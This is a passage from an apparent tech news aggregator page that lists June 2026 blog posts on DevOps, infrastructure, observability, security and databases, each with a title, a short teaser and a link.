        </h3><p>Why controlling code and agents in the AI era matters—and why we built AgentControl.</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/speed-isnt-the-risk-lack-of-control-is/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale" class="group relative scroll-mt-24">
        <a href="#h3-making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Making secret scanning more trustworthy: Reducing false positives at scale
        </a>
        </h3><p>Alerts are more trustworthy and actionable when noise is reduced. See how we improved the verification step with context-aware LLM reasoning.</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/making-secret-scanning-more-trustworthy-reducing-false-positives-at-scale/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1902-18115-18108" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1902-18115-18108" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.0.2, 18.11.5, 18.10.8
        </a>
        </h3><p><strong>📅 Jun 11, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-0-2-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-give-github-copilot-cli-real-code-intelligence-with-language-servers" class="group relative scroll-mt-24">
        <a href="#h3-give-github-copilot-cli-real-code-intelligence-with-language-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Give GitHub Copilot CLI real code intelligence with language servers
        </a>
        </h3><p>Install and configure LSP servers for GitHub Copilot CLI, replacing brute-force grep/decompile with real code intelligence.</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/give-github-copilot-cli-real-code-intelligence-with-language-servers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-gitlab-orbit-full-code-and-lifecycle-context-in-one-query" class="group relative scroll-mt-24">
        <a href="#h3-introducing-gitlab-orbit-full-code-and-lifecycle-context-in-one-query" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing GitLab Orbit: Full code and lifecycle context, in one query
        </a>
        </h3><p>Agents are good at writing code. They&#39;re far worse at navigating the system around it: the related code, the pipelines that run it, the deployments that ship it, the work items that asked for it, and </p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/introducing-gitlab-orbit/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-flex-commit-once-reshape-your-seats-and-ai-spend" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-flex-commit-once-reshape-your-seats-and-ai-spend" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Flex: Commit once, reshape your seats and AI spend
        </a>
        </h3><p>The agentic era made your needs harder to predict, and the way you buy software hasn&#39;t caught up. Six months out, you don&#39;t know how many seats you&#39;ll need, how much AI your teams will consume, or whi</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/introducing-gitlab-flex/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-built-for-the-agentic-engineering-era" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-built-for-the-agentic-engineering-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab: Built for the agentic engineering era
        </a>
        </h3><p>GitLab Transcend, our customer event showcasing our roadmap, success stories, and industry research just wrapped. Here&#39;s what we announced and demonstrated: Next-generation source code management, a G</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-transcend-announcements/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-modern-mainframe-devops-automate-cicd-for-zos-application" class="group relative scroll-mt-24">
        <a href="#h3-modern-mainframe-devops-automate-cicd-for-zos-application" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modern Mainframe DevOps: Automate CI/CD for z/OS Application
        </a>
        </h3><p>Drive developer productivity by replacing brittle, legacy mainframe scripts with declarative, secure, and fully automated multi-tier release pipelines.</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/mainframe-devops-modern-ci-cd-for-big-iron"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling automated infrastructure compliance in telecommunications using Red Hat Ansible Automation Platform
        </a>
        </h3><p>As telecommunications (telco) mobile networks evolve from physical hardware to virtualized and containerized infrastructure, the volume of necessary network element upgrades has increased exponentiall</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-sagemaker-ai-now-supports-serverless-fine-tuning-for-nvidia-nemotron-models" class="group relative scroll-mt-24">
        <a href="#h3-sagemaker-ai-now-supports-serverless-fine-tuning-for-nvidia-nemotron-models" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 SageMaker AI now supports serverless fine-tuning for NVIDIA Nemotron models
        </a>
        </h3><p>Amazon SageMaker AI now supports serverless model customization for NVIDIA Nemotron 3 Nano model using supervised fine-tuning (SFT) and reinforcement fine-tuning (RFT). This is a popular open-weight m</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-sagemaker-ft-nemotron-3/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-12-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-12-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 12, 2026
        </a>
        </h3><p>The AI-enabled enterprise: Why we are applying software engineering principles to business operations. Red Hat is applying the concept of Business as Code to reshape its own business operations. Serving</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-12-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-otel-arrow-phase-2-from-efficient-transport-to-efficient-telemetry-pipelines" class="group relative scroll-mt-24">
        <a href="#h3-otel-arrow-phase-2-from-efficient-transport-to-efficient-telemetry-pipelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OTel-Arrow Phase 2: From Efficient Transport to Efficient Telemetry Pipelines
        </a>
        </h3><p>Phase 1 of OTel-Arrow established OTAP, the OpenTelemetry Arrow Protocol, as an efficient transport protocol for OpenTelemetry. Apache Arrow is a language-independent, columnar in-memory format design</p>
<p><strong>📅 Jun 13, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/otel-arrow-phase-2/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-better-faster-less-wrong-enhancing-issue-grouping" class="group relative scroll-mt-24">
        <a href="#h3-better-faster-less-wrong-enhancing-issue-grouping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Better, faster, less wrong: Enhancing issue grouping
        </a>
        </h3><p>Sentry&#39;s new AI grouping model prevents 20% more duplicate issues while cutting incorrect merges in half. Here&#39;s how we trained and deployed it.</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/enhancing-issue-grouping/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-state-of-ai-coding-2026" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-state-of-ai-coding-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the State of AI Coding 2026
        </a>
        </h3><p>New Relic&#39;s 2026 State of AI Coding Report surveys 200 U.S. tech leaders on generative and agentic AI tools moving from personal sandboxes to production pipelines.</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/ai/state-of-ai-coding-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-exploring-ai-integration-in-zabbix-with-gemini-and-webmcp" class="group relative scroll-mt-24">
        <a href="#h3-exploring-ai-integration-in-zabbix-with-gemini-and-webmcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Exploring AI Integration in Zabbix with Gemini and WebMCP
        </a>
        </h3><p>When I first started working with Zabbix in banking and telecommunications over a decade ago, the workflow was always the same: something breaks, an alert fires, you open the dashboard, you diagnose, </p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 Zabbix Blog</strong></p>
<p><a href="https://blog.zabbix.com/exploring-ai-integration-in-zabbix-with-gemini-and-webmcp/33050/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-best-datadog-alternatives-for-modern-observability-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-best-datadog-alternatives-for-modern-observability-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Best Datadog Alternatives for Modern Observability in 2026
        </a>
        </h3><p>Discover the best Datadog alternatives to improve observability, reduce costs, and unify telemetry for your engineering team’s reliability and efficiency.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/datadog-alternatives"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-logs-vs-metrics-whats-the-difference-in-observability" class="group relative scroll-mt-24">
        <a href="#h3-logs-vs-metrics-whats-the-difference-in-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Logs vs Metrics: What’s the Difference in Observability?
        </a>
        </h3><p>Understand when to use logs vs metrics for effective monitoring and debugging. Learn how a unified approach improves incident response and system insights.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/log/logs-vs-metrics"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-source-observability-tools-setup-and-trade-offs" class="group relative scroll-mt-24">
        <a href="#h3-open-source-observability-tools-setup-and-trade-offs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open Source Observability: Tools, Setup, and Trade-offs
        </a>
        </h3><p>Learn how to build effective open source observability that improves system reliability and reduces complexity with proven tools and strategies.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/kubernetes-observability"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-respect-and-trust-as-devops-engineering-disciplines" class="group relative scroll-mt-24">
        <a href="#h3-respect-and-trust-as-devops-engineering-disciplines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Respect and Trust as DevOps Engineering Disciplines
        </a>
        </h3><p>Respect and trust are DevOps engineering disciplines. They shape flow, quality, security, reliability, and adaptation.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/respect-and-trust-as-devops-engineering-disciplines/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-opinion-the-anthropic-dispute-is-not-really-about-anthropic-its-about-trust" class="group relative scroll-mt-24">
        <a href="#h3-opinion-the-anthropic-dispute-is-not-really-about-anthropic-its-about-trust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Opinion: The Anthropic Dispute Is Not Really About Anthropic. It’s About Trust.
        </a>
        </h3><p>When the US government effectively forced Anthropic to suspend access to some of its newest AI models over security concerns (Fable 5, Mythos 5), much of the debate immediately split into familiar cam</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/anthropic-suspension/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-government-just-banned-an-ai-model-an-engineers-perspective" class="group relative scroll-mt-24">
        <a href="#h3-the-government-just-banned-an-ai-model-an-engineers-perspective" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Government Just Banned an AI Model. An Engineer's Perspective.
        </a>
        </h3><p>A government order abruptly took down a powerful AI model, exposing a new kind of supply chain risk for engineering teams. Security leaders need contingency plans before the next model disappears.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/government-ban-ai-model-engineer-perspective/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-when-a-government-pulls-an-ai-model-what-the-fable-5-and-mythos-5-suspension-means-for-security-teams" class="group relative scroll-mt-24">
        <a href="#h3-when-a-government-pulls-an-ai-model-what-the-fable-5-and-mythos-5-suspension-means-for-security-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 When a Government Pulls an AI Model: What the Fable 5 and Mythos 5 Suspension Means for Security Teams
        </a>
        </h3><p>On June 12, 2026, a US export-control directive led Anthropic to disable Claude Fable 5 and Mythos 5 worldwide over a reported jailbreak. The reported trigger was a code-analysis capability that defen</p>
<p><strong>📅 Jun 14, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/fable-mythos-suspension-security-takeaways/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-security-insights-how-we-achieved-a-10x-increase-in-global-scanning-capacity" class="group relative scroll-mt-24">
        <a href="#h3-scaling-security-insights-how-we-achieved-a-10x-increase-in-global-scanning-capacity" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling Security Insights: how we achieved a 10x increase in global scanning capacity
        </a>
        </h3><p>Cloudflare Security Insights system now processes over 120 scans per second, providing frequent insights for all customers. By optimizing Kafka consumers, Postgres queries, and our API, we scaled our </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/scaling-security-scans/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai" class="group relative scroll-mt-24">
        <a href="#h3-suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 SUSE at GITEX AI Europe 2026: Empowering Sovereign Digital Transformation and Enterprise AI
        </a>
        </h3><p>As European enterprises drive toward a bold, open and connected digital future, the race to implement artificial intelligence is accelerating. However, scaling AI workloads while maintaining complete </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-powering-the-next-era-of-confidential-ai" class="group relative scroll-mt-24">
        <a href="#h3-powering-the-next-era-of-confidential-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Powering the next era of Confidential AI
        </a>
        </h3><p>At Google Cloud, we’re committed to providing the most advanced, secure, and private infrastructure for the most demanding AI workloads, and partnering with a broad and diverse range of organizations </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-copilot-autofix-for-github-advanced-security-for-azure-devops" class="group relative scroll-mt-24">
        <a href="#h3-copilot-autofix-for-github-advanced-security-for-azure-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Copilot Autofix for GitHub Advanced Security for Azure DevOps
        </a>
        </h3><p>Over the last few years, we’ve encouraged customers to move their repositories from Azure Repos to GitHub, where the newest AI-powered and agentic development experiences land first. Migrating isn’t e</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/copilot-autofix-for-github-advanced-security-for-azure-devops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-defend-against-frontier-cyber-models-cloudflares-architecture-as-customer-zero" class="group relative scroll-mt-24">
        <a href="#h3-defend-against-frontier-cyber-models-cloudflares-architecture-as-customer-zero" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Defend against frontier cyber models: Cloudflare's architecture as customer zero
        </a>
        </h3><p>In our post about Project Glasswing, we made the argument that the architecture around a vulnerability matters more than the speed of the patch. Here we walk through what that architecture looks like,</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/frontier-model-defense/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-5-software-supply-chain-security-best-practices-for-development-teams" class="group relative scroll-mt-24">
        <a href="#h3-5-software-supply-chain-security-best-practices-for-development-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 5 Software Supply Chain Security Best Practices for Development Teams
        </a>
        </h3><p>Understanding software supply chain security is one thing. Putting it into practice across a real pipeline, with real deadlines and real constraints, is another. Most organizations recognize that thei</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/software-supply-chain-security-best-practices/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-database-branching-for-ai-agents-how-tine-solves-the-schema-drift-problem" class="group relative scroll-mt-24">
        <a href="#h3-database-branching-for-ai-agents-how-tine-solves-the-schema-drift-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Database Branching for AI Agents: How TINE Solves the Schema Drift Problem
        </a>
        </h3><p>Key Takeaways AI coding agents are no longer a novelty. From Claude Code to Cursor’s agent mode, from GitHub Copilot Workspace to OpenAI Codex, “generate an app from a prompt” demos flood developer fe</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-branching-ai-agents-tine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-conways-law-in-reverse-why-ai-agents-need-one-database-not-ten" class="group relative scroll-mt-24">
        <a href="#h3-conways-law-in-reverse-why-ai-agents-need-one-database-not-ten" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Conway’s Law in Reverse: Why AI Agents Need One Database, Not Ten
        </a>
        </h3><p>Agentic AI did not create a new kind of database. It revealed which ones were already built for it. Across 2026 so far, a wave of large software companies have cut tens of thousands of roles and expla</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-consolidation-for-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-production-ready-agents-need-a-production-ready-data-platform" class="group relative scroll-mt-24">
        <a href="#h3-production-ready-agents-need-a-production-ready-data-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Production-Ready Agents Need A Production-Ready Data Platform
        </a>
        </h3><p>There’s a common theme to the conversations I’ve been having with AI teams lately: change. Constant, head-spinning change. Teams across industries are evaluating and re-evaluating model providers, age</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/production-ready-agents-need-production-ready-data-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-customer-experience-spotlight-faisal-saeed" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-customer-experience-spotlight-faisal-saeed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Customer Experience Spotlight: Faisal Saeed
        </a>
        </h3><p>Welcome to the second installment of a new blog series introducing some of the experts you might encounter when you work with ScyllaDB. (In the first, we met Tyler Denton, Solutions Architect). Today </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/11/cx-spotlight-faisal-saeed/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-connect-your-redis-index-to-ai-agents-with-redisvl-mcp" class="group relative scroll-mt-24">
        <a href="#h3-connect-your-redis-index-to-ai-agents-with-redisvl-mcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Connect Your Redis index to AI agents with RedisVL MCP
        </a>
        </h3><p>If you already use Redis for search, retrieval, or application memory, the RedisVL MCP is a practical next step: making that data available to agents without rebuilding your integration for every fram</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/connect-your-redis-index-to-ai-agents-with-redisvl-mcp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-persistent-scalable-ai-agent-memory-with-tidb" class="group relative scroll-mt-24">
        <a href="#h3-build-persistent-scalable-ai-agent-memory-with-tidb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build Persistent, Scalable AI Agent Memory with TiDB
        </a>
        </h3><p>I gave a session at Microsoft Build 2026 on agent memory with TiDB. A few people asked for the code afterward, so here’s a complete write up of the session: The same pattern as the talk, with copy-pas</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/agent-memory-database-tidb/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-im-returning-to-the-distributed-sql-summit" class="group relative scroll-mt-24">
        <a href="#h3-why-im-returning-to-the-distributed-sql-summit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why I’m Returning to the Distributed SQL Summit
        </a>
        </h3><p>The Distributed SQL Summit showcases how you can use YugabyteDB to power GenAI applications, explores real-world use cases, and provides practical demonstrations of best practices to help you build ul</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/why-im-returning-to-the-distributed-sql-summit/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-real-time-fraud-detection-for-financial-transactions" class="group relative scroll-mt-24">
        <a href="#h3-real-time-fraud-detection-for-financial-transactions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Real-time fraud detection for financial transactions
        </a>
        </h3><p>When a customer taps &quot;pay,&quot; a clock starts that your fraud system can&#39;t pause. The payment authorization resolves in a fixed window whether your model has scored the transaction or not. If it hasn&#39;t, </p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/real-time-fraud-detection/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-windows-in-ai-why-every-token-is-a-budget-decision" class="group relative scroll-mt-24">
        <a href="#h3-context-windows-in-ai-why-every-token-is-a-budget-decision" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context windows in AI: why every token is a budget decision
        </a>
        </h3><p>Some of today&#39;s most capable LLMs now support very large context windows. That doesn&#39;t mean you should fill them. Context windows have grown fast, but the underlying cost and quality tradeoffs haven&#39;t</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-window-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering" class="group relative scroll-mt-24">
        <a href="#h3-connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Connecting to Redis Cloud with AWS PrivateLink vs. VPC peering
        </a>
        </h3><p>AWS PrivateLink resource endpoints are now generally available across all Redis Cloud Pro subscription types, including Redis Flex and Active-Active deployments. That means you can connect apps to Red</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgpool-ii-472-467-4512-4417-and-4320-released" class="group relative scroll-mt-24">
        <a href="#h3-pgpool-ii-472-467-4512-4417-and-4320-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Pgpool-II 4.7.2, 4.6.7, 4.5.12, 4.4.17 and 4.3.20 released.
        </a>
        </h3><p>What is Pgpool-II? Pgpool-II is a tool to add useful features to PostgreSQL, including: connection pooling, load balancing, automatic failover, and more. Minor releases Pgpool Global Development Group is</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgpool-ii-472-467-4512-4417-and-4320-released-3314/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-anonymizer-31-introducing-local-differential-privacy" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-anonymizer-31-introducing-local-differential-privacy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL Anonymizer 3.1 : Introducing Local Differential Privacy
        </a>
        </h3><p>Eymoutiers, France, May 27th, 2026 Dalibo is pleased to announce PostgreSQL Anonymizer 3.1 introducing innovative data masking techniques to protect your data! Enhanced Privacy Protection for Your Da</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-anonymizer-31-introducing-local-differential-privacy-3311/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
